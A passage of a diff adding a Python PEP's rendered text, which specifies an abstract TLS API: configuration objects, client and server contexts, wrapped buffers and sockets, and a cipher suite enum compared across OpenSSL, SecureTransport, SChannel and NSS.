+        validation is enabled, in which case all forms of validation are
+        performed including hostname validation if possible, or validation
+        is disabled, in which case no validation is performed.
+
+        Not all backends support having their certificate validation
+        disabled. If a backend does not support having their certificate
+        validation disabled, attempting to set this property to ``False``
+        will throw a ``TLSError`` when this object is passed into a
+        context object.
+
+    :param certificate_chain Tuple[Tuple[Certificate],PrivateKey]: The
+        certificate, intermediate certificate, and the corresponding
+        private key for the leaf certificate. These certificates will be
+        offered to the remote peer during the handshake if required.
+
+        The first Certificate in the list must be the leaf certificate. All
+        subsequent certificates will be offered as intermediate additional
+        certificates.
+
+    :param ciphers Tuple[Union[CipherSuite, int]]:
+        The available ciphers for TLS connections created with this
+        configuration, in priority order.
+
+    :param inner_protocols Tuple[Union[NextProtocol, bytes]]:
+        Protocols that connections created with this configuration should
+        advertise as supported during the TLS handshake. These may be
+        advertised using either or both of ALPN or NPN. This list of
+        protocols should be ordered by preference.
+
+    :param lowest_supported_version TLSVersion:
+        The minimum version of TLS that should be allowed on TLS
+        connections using this configuration.
+
+    :param highest_supported_version TLSVersion:
+        The maximum version of TLS that should be allowed on TLS
+        connections using this configuration.
+
+    :param trust_store TrustStore:
+        The trust store that connections using this configuration will use
+        to validate certificates.
+
+    :param sni_callback Optional[ServerNameCallback]:
+        A callback function that will be called after the TLS Client Hello
+        handshake message has been received by the TLS server when the TLS
+        client specifies a server name indication.
+
+        Only one callback can be set per ``TLSConfiguration``. If the
+        ``sni_callback`` is ``None`` then the callback is disabled. If the
+        ``TLSConfiguration`` is used for a ``ClientContext`` then this
+        setting will be ignored.
+
+        The ``callback`` function will be called with three arguments: the
+        first will be the ``TLSBufferObject`` for the connection; the
+        second will be a string that represents the server name that the
+        client is intending to communicate (or ``None`` if the TLS Client
+        Hello does not contain a server name); and the third argument will
+        be the original ``TLSConfiguration`` that configured the
+        connection. The server name argument will be the IDNA *decoded*
+        server name.
+
+        The ``callback`` must return a ``TLSConfiguration`` to allow
+        negotiation to continue. Other return values signal errors.
+        Attempting to control what error is signaled by the underlying TLS
+        implementation is not specified in this API, but is up to the
+        concrete implementation to handle.
+
+        The Context will do its best to apply the ``TLSConfiguration``
+        changes from its original configuration to the incoming connection.
+        This will usually include changing the certificate chain, but may
+        also include changes to allowable ciphers or any other
+        configuration settings.
+    """
+    __slots__ = ()
+
+    def __new__(cls, validate_certificates: Optional[bool] = None,
+                     certificate_chain: Optional[Tuple[Tuple[Certificate], PrivateKey]] = None,
+                     ciphers: Optional[Tuple[Union[CipherSuite, int]]] = None,
+                     inner_protocols: Optional[Tuple[Union[NextProtocol, bytes]]] = None,
+                     lowest_supported_version: Optional[TLSVersion] = None,
+                     highest_supported_version: Optional[TLSVersion] = None,
+                     trust_store: Optional[TrustStore] = None,
+                     sni_callback: Optional[ServerNameCallback] = None):
+
+        if validate_certificates is None:
+            validate_certificates = True
+
+        if ciphers is None:
+            ciphers = DEFAULT_CIPHER_LIST
+
+        if inner_protocols is None:
+            inner_protocols = []
+
+        if lowest_supported_version is None:
+            lowest_supported_version = TLSVersion.TLSv1
+
+        if highest_supported_version is None:
+            highest_supported_version = TLSVersion.MAXIMUM_SUPPORTED
+
+        return super().__new__(
+            cls, validate_certificates, certificate_chain, ciphers,
+            inner_protocols, lowest_supported_version,
+            highest_supported_version, trust_store, sni_callback
+        )
+
+    def update(self, validate_certificates=_DEFAULT_VALUE,
+                     certificate_chain=_DEFAULT_VALUE,
+                     ciphers=_DEFAULT_VALUE,
+                     inner_protocols=_DEFAULT_VALUE,
+                     lowest_supported_version=_DEFAULT_VALUE,
+                     highest_supported_version=_DEFAULT_VALUE,
+                     trust_store=_DEFAULT_VALUE,
+                     sni_callback=_DEFAULT_VALUE):
+        """
+        Create a new ``TLSConfiguration``, overriding some of the settings
+        on the original configuration with the new settings.
+        """
+        if validate_certificates is _DEFAULT_VALUE:
+            validate_certificates = self.validate_certificates
+
+        if certificate_chain is _DEFAULT_VALUE:
+            certificate_chain = self.certificate_chain
+
+        if ciphers is _DEFAULT_VALUE:
+            ciphers = self.ciphers
+
+        if inner_protocols is _DEFAULT_VALUE:
+            inner_protocols = self.inner_protocols
+
+        if lowest_supported_version is _DEFAULT_VALUE:
+            lowest_supported_version = self.lowest_supported_version
+
+        if highest_supported_version is _DEFAULT_VALUE:
+            highest_supported_version = self.highest_supported_version
+
+        if trust_store is _DEFAULT_VALUE:
+            trust_store = self.trust_store
+
+        if sni_callback is _DEFAULT_VALUE:
+            sni_callback = self.sni_callback
+
+        return self.__class__(
+            validate_certificates, certificate_chain, ciphers,
+            inner_protocols, lowest_supported_version,
+            highest_supported_version, trust_store, sni_callback
+        )
+
+
+
+
+

Context

+

We define two Context abstract base classes. These ABCs define objects that +allow configuration of TLS to be applied to specific connections. They can be +thought of as factories for TLSWrappedSocket and TLSWrappedBuffer +objects.

+

Unlike the current ssl module, we provide two context classes instead of +one. Specifically, we provide the ClientContext and ServerContext +classes. This simplifies the APIs (for example, there is no sense in the server +providing the server_hostname parameter to ssl.SSLContext.wrap_socket, +but because there is only one context class that parameter is still available), +and ensures that implementations know as early as possible which side of a TLS +connection they will serve. Additionally, it allows implementations to opt-out +of one or either side of the connection. For example, SecureTransport on macOS +is not really intended for server use and has an enormous amount of +functionality missing for server-side use. This would allow SecureTransport +implementations to simply not define a concrete subclass of ServerContext +to signal their lack of support.

+

One of the other major differences to the current ssl module is that a +number of flags and options have been removed. Most of these are self-evident, +but it is worth noting that auto_handshake has been removed from +wrap_socket. This was removed because it fundamentally represents an odd +design wart that saves very minimal effort at the cost of a complexity increase +both for users and implementers. This PEP requires that all users call +do_handshake explicitly after connecting.

+

As much as possible implementers should aim to make these classes immutable: +that is, they should prefer not to allow users to mutate their internal state +directly, instead preferring to create new contexts from new TLSConfiguration +objects. Obviously, the ABCs cannot enforce this constraint, and so they do not +attempt to.

+

The Context abstract base class has the following class definition:

+
TLSBufferObject = Union[TLSWrappedSocket, TLSWrappedBuffer]
+
+
+class _BaseContext(metaclass=ABCMeta):
+    @abstractmethod
+    def __init__(self, configuration: TLSConfiguration):
+        """
+        Create a new context object from a given TLS configuration.
+        """
+
+    @property
+    @abstractmethod
+    def configuration(self) -> TLSConfiguration:
+        """
+        Returns the TLS configuration that was used to create the context.
+        """
+
+
+class ClientContext(_BaseContext):
+    def wrap_socket(self,
+                    socket: socket.socket,
+                    server_hostname: Optional[str]) -> TLSWrappedSocket:
+        """
+        Wrap an existing Python socket object ``socket`` and return a
+        ``TLSWrappedSocket`` object. ``socket`` must be a ``SOCK_STREAM``
+        socket: all other socket types are unsupported.
+
+        The returned SSL socket is tied to the context, its settings and
+        certificates. The socket object originally passed to this method
+        should not be used again: attempting to use it in any way will lead
+        to undefined behaviour, especially across different TLS
+        implementations. To get the original socket object back once it has
+        been wrapped in TLS, see the ``unwrap`` method of the
+        TLSWrappedSocket.
+
+        The parameter ``server_hostname`` specifies the hostname of the
+        service which we are connecting to. This allows a single server to
+        host multiple SSL-based services with distinct certificates, quite
+        similarly to HTTP virtual hosts. This is also used to validate the
+        TLS certificate for the given hostname. If hostname validation is
+        not desired, then pass ``None`` for this parameter. This parameter
+        has no default value because opting-out of hostname validation is
+        dangerous, and should not be the default behaviour.
+        """
+        buffer = self.wrap_buffers(server_hostname)
+        return TLSWrappedSocket(socket, buffer)
+
+    @abstractmethod
+    def wrap_buffers(self, server_hostname: Optional[str]) -> TLSWrappedBuffer:
+        """
+        Create an in-memory stream for TLS, using memory buffers to store
+        incoming and outgoing ciphertext. The TLS routines will read
+        received TLS data from one buffer, and write TLS data that needs to
+        be emitted to another buffer.
+
+        The implementation details of how this buffering works are up to
+        the individual TLS implementation. This allows TLS libraries that
+        have their own specialised support to continue to do so, while
+        allowing those without to use whatever Python objects they see fit.
+
+        The ``server_hostname`` parameter has the same meaning as in
+        ``wrap_socket``.
+        """
+
+
+class ServerContext(_BaseContext):
+    def wrap_socket(self, socket: socket.socket) -> TLSWrappedSocket:
+        """
+        Wrap an existing Python socket object ``socket`` and return a
+        ``TLSWrappedSocket`` object. ``socket`` must be a ``SOCK_STREAM``
+        socket: all other socket types are unsupported.
+
+        The returned SSL socket is tied to the context, its settings and
+        certificates. The socket object originally passed to this method
+        should not be used again: attempting to use it in any way will lead
+        to undefined behaviour, especially across different TLS
+        implementations. To get the original socket object back once it has
+        been wrapped in TLS, see the ``unwrap`` method of the
+        TLSWrappedSocket.
+        """
+        buffer = self.wrap_buffers()
+        return TLSWrappedSocket(socket, buffer)
+
+    @abstractmethod
+    def wrap_buffers(self) -> TLSWrappedBuffer:
+        """
+        Create an in-memory stream for TLS, using memory buffers to store
+        incoming and outgoing ciphertext. The TLS routines will read
+        received TLS data from one buffer, and write TLS data that needs to
+        be emitted to another buffer.
+
+        The implementation details of how this buffering works are up to
+        the individual TLS implementation. This allows TLS libraries that
+        have their own specialised support to continue to do so, while
+        allowing those without to use whatever Python objects they see fit.
+        """
+
+
+
+
+

Buffer

+

The buffer-wrapper ABC will be defined by the TLSWrappedBuffer ABC, which +has the following definition:

+
class TLSWrappedBuffer(metaclass=ABCMeta):
+    @abstractmethod
+    def read(self, amt: int) -> bytes:
+        """
+        Read up to ``amt`` bytes of data from the input buffer and return
+        the result as a ``bytes`` instance.
+
+        Once EOF is reached, all further calls to this method return the
+        empty byte string ``b''``.
+
+        May read "short": that is, fewer bytes may be returned than were
+        requested.
+
+        Raise ``WantReadError`` or ``WantWriteError`` if there is
+        insufficient data in either the input or output buffer and the
+        operation would have caused data to be written or read.
+
+        May raise ``RaggedEOF`` if the connection has been closed without a
+        graceful TLS shutdown. Whether this is an exception that should be
+        ignored or not is up to the specific application.
+
+        As at any time a re-negotiation is possible, a call to ``read()``
+        can also cause write operations.
+        """
+
+    @abstractmethod
+    def readinto(self, buffer: Any, amt: int) -> int:
+        """
+        Read up to ``amt`` bytes of data from the input buffer into
+        ``buffer``, which must be an object that implements the buffer
+        protocol. Returns the number of bytes read.
+
+        Once EOF is reached, all further calls to this method return the
+        empty byte string ``b''``.
+
+        Raises ``WantReadError`` or ``WantWriteError`` if there is
+        insufficient data in either the input or output buffer and the
+        operation would have caused data to be written or read.
+
+        May read "short": that is, fewer bytes may be read than were
+        requested.
+
+        May raise ``RaggedEOF`` if the connection has been closed without a
+        graceful TLS shutdown. Whether this is an exception that should be
+        ignored or not is up to the specific application.
+
+        As at any time a re-negotiation is possible, a call to
+        ``readinto()`` can also cause write operations.
+        """
+
+    @abstractmethod
+    def write(self, buf: Any) -> int:
+        """
+        Write ``buf`` in encrypted form to the output buffer and return the
+        number of bytes written. The ``buf`` argument must be an object
+        supporting the buffer interface.
+
+        Raise ``WantReadError`` or ``WantWriteError`` if there is
+        insufficient data in either the input or output buffer and the
+        operation would have caused data to be written or read. In either
+        case, users should endeavour to resolve that situation and then
+        re-call this method. When re-calling this method users *should*
+        re-use the exact same ``buf`` object, as some backends require that
+        the exact same buffer be used.
+
+        This operation may write "short": that is, fewer bytes may be
+        written than were in the buffer.
+
+        As at any time a re-negotiation is possible, a call to ``write()``
+        can also cause read operations.
+        """
+
+    @abstractmethod
+    def do_handshake(self) -> None:
+        """
+        Performs the TLS handshake. Also performs certificate validation
+        and hostname verification.
+        """
+
+    @abstractmethod
+    def cipher(self) -> Optional[Union[CipherSuite, int]]:
+        """
+        Returns the CipherSuite entry for the cipher that has been
+        negotiated on the connection. If no connection has been negotiated,
+        returns ``None``. If the cipher negotiated is not defined in
+        CipherSuite, returns the 16-bit integer representing that cipher
+        directly.
+        """
+
+    @abstractmethod
+    def negotiated_protocol(self) -> Optional[Union[NextProtocol, bytes]]:
+        """
+        Returns the protocol that was selected during the TLS handshake.
+        This selection may have been made using ALPN, NPN, or some future
+        negotiation mechanism.
+
+        If the negotiated protocol is one of the protocols defined in the
+        ``NextProtocol`` enum, the value from that enum will be returned.
+        Otherwise, the raw bytestring of the negotiated protocol will be
+        returned.
+
+        If ``Context.set_inner_protocols()`` was not called, if the other
+        party does not support protocol negotiation, if this socket does
+        not support any of the peer's proposed protocols, or if the
+        handshake has not happened yet, ``None`` is returned.
+        """
+
+    @property
+    @abstractmethod
+    def context(self) -> Context:
+        """
+        The ``Context`` object this buffer is tied to.
+        """
+
+    @abstractproperty
+    def negotiated_tls_version(self) -> Optional[TLSVersion]:
+        """
+        The version of TLS that has been negotiated on this connection.
+        """
+
+    @abstractmethod
+    def shutdown(self) -> None:
+        """
+        Performs a clean TLS shut down. This should generally be used
+        whenever possible to signal to the remote peer that the content is
+        finished.
+        """
+
+    @abstractmethod
+    def receive_from_network(self, data):
+        """
+        Receives some TLS data from the network and stores it in an
+        internal buffer.
+        """
+
+    @abstractmethod
+    def peek_outgoing(self, amt):
+        """
+        Returns the next ``amt`` bytes of data that should be written to
+        the network from the outgoing data buffer, without removing it from
+        the internal buffer.
+        """
+
+    @abstractmethod
+    def consume_outgoing(self, amt):
+        """
+        Discard the next ``amt`` bytes from the outgoing data buffer. This
+        should be used when ``amt`` bytes have been sent on the network, to
+        signal that the data no longer needs to be buffered.
+        """
+
+
+
+
+

Socket

+

The socket-wrapper class will be a concrete class that accepts two items in its +constructor: a regular socket object, and a TLSWrappedBuffer object. This +object will be too large to recreate in this PEP, but will be submitted as part +of the work to build the module.

+

The wrapped socket will implement all of the socket API, though it will have +stub implementations of methods that only work for sockets with types other +than SOCK_STREAM (e.g. sendto/recvfrom). That limitation can be +lifted as-and-when support for DTLS is added to this module.

+

In addition, the socket class will include the following extra methods on top +of the regular socket methods:

+
class TLSWrappedSocket:
+    def do_handshake(self) -> None:
+        """
+        Performs the TLS handshake. Also performs certificate validation
+        and hostname verification. This must be called after the socket has
+        connected (either via ``connect`` or ``accept``), before any other
+        operation is performed on the socket.
+        """
+
+    def cipher(self) -> Optional[Union[CipherSuite, int]]:
+        """
+        Returns the CipherSuite entry for the cipher that has been
+        negotiated on the connection. If no connection has been negotiated,
+        returns ``None``. If the cipher negotiated is not defined in
+        CipherSuite, returns the 16-bit integer representing that cipher
+        directly.
+        """
+
+    def negotiated_protocol(self) -> Optional[Union[NextProtocol, bytes]]:
+        """
+        Returns the protocol that was selected during the TLS handshake.
+        This selection may have been made using ALPN, NPN, or some future
+        negotiation mechanism.
+
+        If the negotiated protocol is one of the protocols defined in the
+        ``NextProtocol`` enum, the value from that enum will be returned.
+        Otherwise, the raw bytestring of the negotiated protocol will be
+        returned.
+
+        If ``Context.set_inner_protocols()`` was not called, if the other
+        party does not support protocol negotiation, if this socket does
+        not support any of the peer's proposed protocols, or if the
+        handshake has not happened yet, ``None`` is returned.
+        """
+
+    @property
+    def context(self) -> Context:
+        """
+        The ``Context`` object this socket is tied to.
+        """
+
+    def negotiated_tls_version(self) -> Optional[TLSVersion]:
+        """
+        The version of TLS that has been negotiated on this connection.
+        """
+
+    def unwrap(self) -> socket.socket:
+        """
+        Cleanly terminate the TLS connection on this wrapped socket. Once
+        called, this ``TLSWrappedSocket`` can no longer be used to transmit
+        data. Returns the socket that was wrapped with TLS.
+        """
+
+
+
+
+

Cipher Suites

+

Supporting cipher suites in a truly library-agnostic fashion is a remarkably +difficult undertaking. Different TLS implementations often have radically +different APIs for specifying cipher suites, but more problematically these +APIs frequently differ in capability as well as in style. Some examples are +shown below:

+
+
OpenSSL
+

OpenSSL uses a well-known cipher string format. This format has been adopted as +a configuration language by most products that use OpenSSL, including Python. +This format is relatively easy to read, but has a number of downsides: it is +a string, which makes it remarkably easy to provide bad inputs; it lacks much +detailed validation, meaning that it is possible to configure OpenSSL in a way +that doesn’t allow it to negotiate any cipher at all; and it allows specifying +cipher suites in a number of different ways that make it tricky to parse. The +biggest problem with this format is that there is no formal specification for +it, meaning that the only way to parse a given string the way OpenSSL would is +to get OpenSSL to parse it.

+

OpenSSL’s cipher strings can look like this:

+
'ECDH+AESGCM:ECDH+CHACHA20:DH+AESGCM:DH+CHACHA20:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:RSA+AESGCM:RSA+AES:!aNULL:!eNULL:!MD5'
+
+
+

This string demonstrates some of the complexity of the OpenSSL format. For +example, it is possible for one entry to specify multiple cipher suites: the +entry ECDH+AESGCM means “all ciphers suites that include both +elliptic-curve Diffie-Hellman key exchange and AES in Galois Counter Mode”. +More explicitly, that will expand to four cipher suites:

+
"ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256"
+
+
+

That makes parsing a complete OpenSSL cipher string extremely tricky. Add to +the fact that there are other meta-characters, such as “!” (exclude all cipher +suites that match this criterion, even if they would otherwise be included: +“!MD5” means that no cipher suites using the MD5 hash algorithm should be +included), “-” (exclude matching ciphers if they were already included, but +allow them to be re-added later if they get included again), and “+” (include +the matching ciphers, but place them at the end of the list), and you get an +extremely complex format to parse. On top of this complexity it should be +noted that the actual result depends on the OpenSSL version, as an OpenSSL +cipher string is valid so long as it contains at least one cipher that OpenSSL +recognises.

+

OpenSSL also uses different names for its ciphers than the names used in the +relevant specifications. See the manual page for ciphers(1) for more +details.

+

The actual API inside OpenSSL for the cipher string is simple:

+
char *cipher_list = <some cipher list>;
+int rc = SSL_CTX_set_cipher_list(context, cipher_list);
+
+
+

This means that any format that is used by this module must be able to be +converted to an OpenSSL cipher string for use with OpenSSL.

+
+
+
SecureTransport
+

SecureTransport is the macOS system TLS library. This library is substantially +more restricted than OpenSSL in many ways, as it has a much more restricted +class of users. One of these substantial restrictions is in controlling +supported cipher suites.

+

Ciphers in SecureTransport are represented by a C enum. This enum has one +entry per cipher suite, with no aggregate entries, meaning that it is not +possible to reproduce the meaning of an OpenSSL cipher string like +“ECDH+AESGCM” without hand-coding which categories each enum member falls into.

+

However, the names of most of the enum members are in line with the formal +names of the cipher suites: that is, the cipher suite that OpenSSL calls +“ECDHE-ECDSA-AES256-GCM-SHA384” is called +“TLS_ECDHE_ECDHSA_WITH_AES_256_GCM_SHA384” in SecureTransport.

+

The API for configuring cipher suites inside SecureTransport is simple:

+
SSLCipherSuite ciphers[] = {TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, ...};
+OSStatus status = SSLSetEnabledCiphers(context, ciphers, sizeof(ciphers));
+
+
+
+
+
SChannel
+

SChannel is the Windows system TLS library.

+

SChannel has extremely restrictive support for controlling available TLS +cipher suites, and additionally adopts a third method of expressing what TLS +cipher suites are supported.

+

Specifically, SChannel defines a set of ALG_ID constants (C unsigned ints). +Each of these constants does not refer to an entire cipher suite, but instead +an individual algorithm. Some examples are CALG_3DES and CALG_AES_256, +which refer to the bulk encryption algorithm used in a cipher suite, +CALG_DH_EPHEM and CALG_RSA_KEYX which refer to part of the key exchange +algorithm used in a cipher suite, CALG_SHA1 and CALG_MD5 which refer to +the message authentication code used in a cipher suite, and CALG_ECDSA and +CALG_RSA_SIGN which refer to the signing portions of the key exchange +algorithm.

+

This can be thought of as the half of OpenSSL’s functionality that +SecureTransport doesn’t have: SecureTransport only allows specifying exact +cipher suites, while SChannel only allows specifying parts of the cipher +suite, while OpenSSL allows both.

+

Determining which cipher suites are allowed on a given connection is done by +providing a pointer to an array of these ALG_ID constants. This means that +any suitable API must allow the Python code to determine which ALG_ID +constants must be provided.

+
+
+
Network Security Services (NSS)
+

NSS is Mozilla’s crypto and TLS library. It’s used in Firefox, Thunderbird, +and as alternative to OpenSSL in multiple libraries, e.g. curl.

+

By default, NSS comes with secure configuration of allowed ciphers. On some +platforms such as Fedora, the list of enabled ciphers is globally configured +in a system policy. Generally, applications should not modify cipher suites +unless they have specific reasons to do so.

+

NSS has both process global and per-connection settings for cipher suites. It +does not have a concept of SSLContext like OpenSSL. A SSLContext-like behavior +can be easily emulated. Specifically, ciphers can be enabled or disabled +globally with SSL_CipherPrefSetDefault(PRInt32 cipher, PRBool enabled), +and SSL_CipherPrefSet(PRFileDesc *fd, PRInt32 cipher, PRBool enabled) +for a connection. The cipher PRInt32 number is a signed 32bit integer +that directly corresponds to an registered IANA id, e.g. 0x1301 +is TLS_AES_128_GCM_SHA256. Contrary to OpenSSL, the preference order +of ciphers is fixed and cannot be modified at runtime.

+

Like SecureTransport, NSS has no API for aggregated entries. Some consumers +of NSS have implemented custom mappings from OpenSSL cipher names and rules +to NSS ciphers, e.g. mod_nss.

+
+
+
Proposed Interface
+

The proposed interface for the new module is influenced by the combined set of +limitations of the above implementations. Specifically, as every implementation +except OpenSSL requires that each individual cipher be provided, there is no +option but to provide that lowest-common denominator approach.

+

The simplest approach is to provide an enumerated type that includes a large +subset of the cipher suites defined for TLS. The values of the enum members +will be their two-octet cipher identifier as used in the TLS handshake, +stored as a 16 bit integer. The names of the enum members will be their +IANA-registered cipher suite names.

+

As of now, the IANA cipher suite registry contains over 320 cipher suites. +A large portion of the cipher suites are irrelevant for TLS connections to +network services. Other suites specify deprecated and insecure algorithms +that are no longer provided by recent versions of implementations. The enum +does not contain ciphers with:

+
    +
  • key exchange: NULL, Kerberos (KRB5), pre-shared key (PSK), secure remote +transport (TLS-SRP)
  • +
  • authentication: NULL, anonymous, export grade, Kerberos (KRB5), +pre-shared key (PSK), secure remote transport (TLS-SRP), DSA cert (DSS)
  • +
  • encryption: NULL, ARIA, DES, RC2, export grade 40bit
  • +
  • PRF: MD5
  • +
  • SCSV cipher suites
  • +
+

3DES, RC4, SEED, and IDEA are included for legacy applications. Further more +five additional cipher suites from the TLS 1.3 draft (draft-ietf-tls-tls13-18) +are included, too. TLS 1.3 does not share any cipher suites with TLS 1.2 and +earlier. The resulting enum will contain roughly 110 suites.

+

Because of these limitations, and because the enum doesn’t contain every +defined cipher, and also to allow for forward-looking applications, all parts +of this API that accept CipherSuite objects will also accept raw 16-bit +integers directly.

+

Rather than populate this enum by hand, we have a TLS enum script that +builds it from Christian Heimes’ tlsdb JSON file (warning: +large file) and IANA cipher suite registry. The TLSDB also opens up the +possibility of extending the API with additional querying function, +such as determining which TLS versions support which ciphers, if that +functionality is found to be useful or necessary.

+

If users find this approach to be onerous, a future extension to this API can +provide helpers that can reintroduce OpenSSL’s aggregation functionality.

+
class CipherSuite(IntEnum):
+    TLS_RSA_WITH_RC4_128_SHA = 0x0005
+    TLS_RSA_WITH_IDEA_CBC_SHA = 0x0007
+    TLS_RSA_WITH_3DES_EDE_CBC_SHA = 0x000a
+    TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA = 0x0010
+    TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA = 0x0016
+    TLS_RSA_WITH_AES_128_CBC_SHA = 0x002f
+    TLS_DH_RSA_WITH_AES_128_CBC_SHA = 0x0031
+    TLS_DHE_RSA_WITH_AES_128_CBC_SHA = 0x0033
+    TLS_RSA_WITH_AES_256_CBC_SHA = 0x0035
+    TLS_DH_RSA_WITH_AES_256_CBC_SHA = 0x0037
+    TLS_DHE_RSA_WITH_AES_256_CBC_SHA = 0x0039
+    TLS_RSA_WITH_AES_128_CBC_SHA256 = 0x003c
+    TLS_RSA_WITH_AES_256_CBC_SHA256 = 0x003d
+    TLS_DH_RSA_WITH_AES_128_CBC_SHA256 = 0x003f
+    TLS_RSA_WITH_CAMELLIA_128_CBC_SHA = 0x0041
+    TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA = 0x0043
+    TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA = 0x0045
+    TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 = 0x0067
+    TLS_DH_RSA_WITH_AES_256_CBC_SHA256 = 0x0069
+    TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 = 0x006b
+    TLS_RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0084
+    TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0086
+    TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0088
+    TLS_RSA_WITH_SEED_CBC_SHA = 0x0096
+    TLS_DH_RSA_WITH_SEED_CBC_SHA = 0x0098
+    TLS_DHE_RSA_WITH_SEED_CBC_SHA = 0x009a
+    TLS_RSA_WITH_AES_128_GCM_SHA256 = 0x009c
+    TLS_RSA_WITH_AES_256_GCM_SHA384 = 0x009d
+    TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 = 0x009e
+    TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 = 0x009f
+    TLS_DH_RSA_WITH_AES_128_GCM_SHA256 = 0x00a0
+    TLS_DH_RSA_WITH_AES_256_GCM_SHA384 = 0x00a1
+    TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0x00ba
+    TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0x00bc
+    TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0x00be
+    TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256 = 0x00c0
+    TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256 = 0x00c2
+    TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256 = 0x00c4
+    TLS_AES_128_GCM_SHA256 = 0x1301
+    TLS_AES_256_GCM_SHA384 = 0x1302
+    TLS_CHACHA20_POLY1305_SHA256 = 0x1303
+    TLS_AES_128_CCM_SHA256 = 0x1304
+    TLS_AES_128_CCM_8_SHA256 = 0x1305
+    TLS_ECDH_ECDSA_WITH_RC4_128_SHA = 0xc002
+    TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA = 0xc003
+    TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA = 0xc004
+    TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA = 0xc005
+    TLS_ECDHE_ECDSA_WITH_RC4_128_SHA = 0xc007
+    TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA = 0xc008
+    TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA = 0xc009
+    TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA = 0xc00a
+    TLS_ECDH_RSA_WITH_RC4_128_SHA = 0xc00c
+    TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA = 0xc00d
+    TLS_ECDH_RSA_WITH_AES_128_CBC_SHA = 0xc00e
+    TLS_ECDH_RSA_WITH_AES_256_CBC_SHA = 0xc00f
+    TLS_ECDHE_RSA_WITH_RC4_128_SHA = 0xc011
+    TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA = 0xc012
+    TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA = 0xc013
+    TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA = 0xc014
+    TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 = 0xc023
+    TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 = 0xc024
+    TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256 = 0xc025
+    TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384 = 0xc026
+    TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 = 0xc027
+    TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 = 0xc028
+    TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256 = 0xc029
+    TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384 = 0xc02a
+    TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 = 0xc02b
+    TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 = 0xc02c
+    TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256 = 0xc02d
+    TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384 = 0xc02e
+    TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 = 0xc02f
+    TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 = 0xc030
+    TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256 = 0xc031
+    TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384 = 0xc032
+    TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_CBC_SHA256 = 0xc072
+    TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_CBC_SHA384 = 0xc073
+    TLS_ECDH_ECDSA_WITH_CAMELLIA_128_CBC_SHA256 = 0xc074
+    TLS_ECDH_ECDSA_WITH_CAMELLIA_256_CBC_SHA384 = 0xc075
+    TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0xc076
+    TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384 = 0xc077
+    TLS_ECDH_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0xc078
+    TLS_ECDH_RSA_WITH_CAMELLIA_256_CBC_SHA384 = 0xc079
+    TLS_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc07a
+    TLS_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc07b
+    TLS_DHE_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc07c
+    TLS_DHE_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc07d
+    TLS_DH_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc07e
+    TLS_DH_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc07f
+    TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc086
+    TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc087
+    TLS_ECDH_ECDSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc088
+    TLS_ECDH_ECDSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc089
+    TLS_ECDHE_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc08a
+    TLS_ECDHE_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc08b
